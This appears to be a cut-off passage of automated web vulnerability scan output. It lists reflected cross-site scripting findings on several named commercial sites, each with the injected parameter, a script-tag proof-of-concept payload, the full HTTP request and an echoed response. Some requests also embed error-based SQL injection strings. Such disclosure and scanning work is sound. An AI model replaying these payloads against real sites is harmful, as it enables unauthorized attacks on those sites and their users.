The value of the billc_organization request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e90c4"><script>alert(1)</script>4c422d990fd was submitted in the billc_organization parameter. This input was echoed as e90c4\"><script>alert(1)</script>4c422d990fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=e90c4"><script>alert(1)</script>4c422d990fd&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1 Host: www.manitu.de Proxy-Connection: keep-alive Referer: http://www.manitu.de/shop/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the billc_phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb713"><script>alert(1)</script>9025fab3457 was submitted in the billc_phone parameter. This input was echoed as eb713\"><script>alert(1)</script>9025fab3457 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=eb713"><script>alert(1)</script>9025fab3457&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1 Host: www.manitu.de Proxy-Connection: keep-alive Referer: http://www.manitu.de/shop/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the billc_street1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7112b"><script>alert(1)</script>9eef17d54b4 was submitted in the billc_street1 parameter. This input was echoed as 7112b\"><script>alert(1)</script>9eef17d54b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=7112b"><script>alert(1)</script>9eef17d54b4&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1 Host: www.manitu.de Proxy-Connection: keep-alive Referer: http://www.manitu.de/shop/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the billc_street2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bf1b"><script>alert(1)</script>a77f499cb1c was submitted in the billc_street2 parameter. This input was echoed as 8bf1b\"><script>alert(1)</script>a77f499cb1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=8bf1b"><script>alert(1)</script>a77f499cb1c&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1 Host: www.manitu.de Proxy-Connection: keep-alive Referer: http://www.manitu.de/shop/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the billc_title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4023"><script>alert(1)</script>7e7e69e7b9f was submitted in the billc_title parameter. This input was echoed as b4023\"><script>alert(1)</script>7e7e69e7b9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=b4023"><script>alert(1)</script>7e7e69e7b9f&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1 Host: www.manitu.de Proxy-Connection: keep-alive Referer: http://www.manitu.de/shop/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the billc_zipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f9a2"><script>alert(1)</script>9f71fef3960 was submitted in the billc_zipcode parameter. This input was echoed as 3f9a2\"><script>alert(1)</script>9f71fef3960 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=3f9a2"><script>alert(1)</script>9f71fef3960&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1 Host: www.manitu.de Proxy-Connection: keep-alive Referer: http://www.manitu.de/shop/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the mode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eabd5</script><script>alert(1)</script>7b31a895f05 was submitted in the mode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cart.asp?mode=logineabd5</script><script>alert(1)</script>7b31a895f05&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001 HTTP/1.1 Host: www.my-happyfeet.com Proxy-Connection: keep-alive Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA
Response
HTTP/1.1 200 OK Date: Wed, 30 Mar 2011 12:10:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Content-Length: 23932 Content-Type: text/html Cache-control: private
<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/). Any reproduction of site content or images without written ...[SNIP]... ked) alert("You haven't selected any items."); return(ischecked); } function doupdate(){ document.forms.checkoutform.mode.value='update'; document.forms.checkoutform.action='cart.asp?mode=logineabd5</script><script>alert(1)</script>7b31a895f05&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001'; document.forms.checkoutform.onsubmit=''; document.forms.checkoutform.submit(); } ...[SNIP]...
5.104. http://www.my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.my-happyfeet.com
Path:
/cart.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f00f</script><script>alert(1)</script>5bebd3dd0d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001&9f00f</script><script>alert(1)</script>5bebd3dd0d2=1 HTTP/1.1 Host: www.my-happyfeet.com Proxy-Connection: keep-alive Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA
Response
HTTP/1.1 200 OK Date: Wed, 30 Mar 2011 12:12:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Content-Length: 24835 Content-Type: text/html Cache-control: private
<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/). Any reproduction of site content or images without written ...[SNIP]... koutform.mode.value='update'; document.forms.checkoutform.action='cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001&9f00f</script><script>alert(1)</script>5bebd3dd0d2=1'; document.forms.checkoutform.onsubmit=''; document.forms.checkoutform.submit(); } var savemenuaction='saveitem'; function dosaveitem(lid){ if(savemenuaction=='saveitem'){ if(!checkcheck ...[SNIP]...
The value of the refurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a19d</script><script>alert(1)</script>4cbf628a43b was submitted in the refurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D00017a19d</script><script>alert(1)</script>4cbf628a43b HTTP/1.1 Host: www.my-happyfeet.com Proxy-Connection: keep-alive Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA
Response
HTTP/1.1 200 OK Date: Wed, 30 Mar 2011 12:11:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Content-Length: 24869 Content-Type: text/html Cache-control: private
<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/). Any reproduction of site content or images without written ...[SNIP]... ckoutform.mode.value='update'; document.forms.checkoutform.action='cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D00017a19d</script><script>alert(1)</script>4cbf628a43b'; document.forms.checkoutform.onsubmit=''; document.forms.checkoutform.submit(); } var savemenuaction='saveitem'; function dosaveitem(lid){ if(savemenuaction=='saveitem'){ if(!checkchecked ...[SNIP]...
The value of the CareerID request parameter is copied into the HTML document as plain text between tags. The payload d9278<script>alert(1)</script>0b50050f2f4 was submitted in the CareerID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17d9278<script>alert(1)</script>0b50050f2f4&SectionID=380 HTTP/1.1 Host: www.nutter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:09:11 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 16006
<!-- careers start -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999 ...[SNIP]... <BR>sql: SELECT CareerTitle FROM careers WHERE CareerID=17d9278<script>alert(1)</script>0b50050f2f4 <div id="NarrativeText"> ...[SNIP]...
The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 98e53<script>alert(1)</script>438881afcf7 was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))98e53<script>alert(1)</script>438881afcf7&CareerID=17&SectionID=380 HTTP/1.1 Host: www.nutter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:08:37 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 15919
<!-- careers start -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999 ...[SNIP]... <br /> error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '98e53<script>alert(1)</script>438881afcf7 LIMIT 1' at line 1 | 1064<BR> ...[SNIP]...
The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6d50b%3balert(1)//7f28521d945 was submitted in the bid parameter. This input was echoed as 6d50b;alert(1)//7f28521d945 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsfb/embed.php?pid=3922&bid=21236d50b%3balert(1)//7f28521d945 HTTP/1.1 Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/archives/'+NSFTW+'?ordering=&searchphrase=all User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var IMAGE_ROOT = 'http://www.paperg.com/beta/'; var flyerboard_root = 'http://www.paperg.com/jsfb/'; var remote_ip = '173.193.214.243'; var view = ''; var edit = '0'; var EMBED_URL21236d50b;alert(1)//7f28521d945 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=21236d50b%3balert(1)//7f28521d945'; // links stylesheets in head function pg_linkss(filename) { var head = document.getElementsByTagName('head') ...[SNIP]...
The value of the _flowId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99f8c"%3balert(1)//8ec3b57aa3 was submitted in the _flowId parameter. This input was echoed as 99f8c";alert(1)//8ec3b57aa3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))99f8c"%3balert(1)//8ec3b57aa3 HTTP/1.1 Host: www.supermedia.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trafficSource=default; CstrStatus=RVU
Response
HTTP/1.1 200 OK Server: Unspecified Date: Fri, 25 Mar 2011 19:14:15 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 22973
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... nt(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))99f8c";alert(1)//8ec3b57aa3' found; the flows available are: array<String> ...[SNIP]...
The value of the cg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc74"%3balert(1)//9a46c961ede was submitted in the cg parameter. This input was echoed as dbc74";alert(1)//9a46c961ede in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9dbc74"%3balert(1)//9a46c961ede&ml=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var IE = document.all?true:false if (!IE) document.captureEvents(Event.MOUSEMOVE) document.onmousemove = getMouseXY; var tempX = 0 var tempY = 0 function getMouseXY(e) { if (IE) { // grab the x-y po ...[SNIP]... <a target=\"_blank\" onclick=\"sp_soclink_click_track('')\" href=\"http://www.superpages.com/inc/social/sln.php?n=9dbc74";alert(1)//9a46c961ede&t="+ urlencode(document.title) +"&u="+ urlencode(location.href) +"&s=1\" title=\"\"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 76ef5--><script>alert(1)</script>094fe3529e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /account76ef5--><script>alert(1)</script>094fe3529e8/login/loginmain%20.jsp HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount
Response
HTTP/1.1 404 Not Found Date: Wed, 30 Mar 2011 17:26:04 GMT Server: Apache Cache-Control: no-cache Pragma: No-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 36926
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 2 is copied into an HTML comment. The payload 9d9e8--><script>alert(1)</script>cf4dc32b2d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /account/login9d9e8--><script>alert(1)</script>cf4dc32b2d0/loginmain%20.jsp HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount
Response
HTTP/1.1 404 Not Found Date: Wed, 30 Mar 2011 17:34:55 GMT Server: Apache Cache-Control: no-cache Pragma: No-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 36926
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
5.113. https://www.territoryahead.com/account/login/loginmain%20.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.territoryahead.com
Path:
/account/login/loginmain%20.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 55d6e--><script>alert(1)</script>83406a853e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /account/login/loginmain%20.jsp?55d6e--><script>alert(1)</script>83406a853e1=1 HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount
Response
HTTP/1.1 404 Not Found Date: Wed, 30 Mar 2011 17:34:51 GMT Server: Apache Cache-Control: no-cache Pragma: No-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 37104
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="ve ...[SNIP]... ET https://www.territoryahead.com/errorhandler.jsp?ruleID=8&itemID=0&itemType=ErrorPage&55d6e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E83406a853e1=1&status=404&itemID=0&itemType=ErrorPage&status=404&55d6e--><script>alert(1)</script>83406a853e1=1 Session ID: eDwn-UFCx4o7 (from cookie)
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7f0d7--><script>alert(1)</script>33d952b95eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
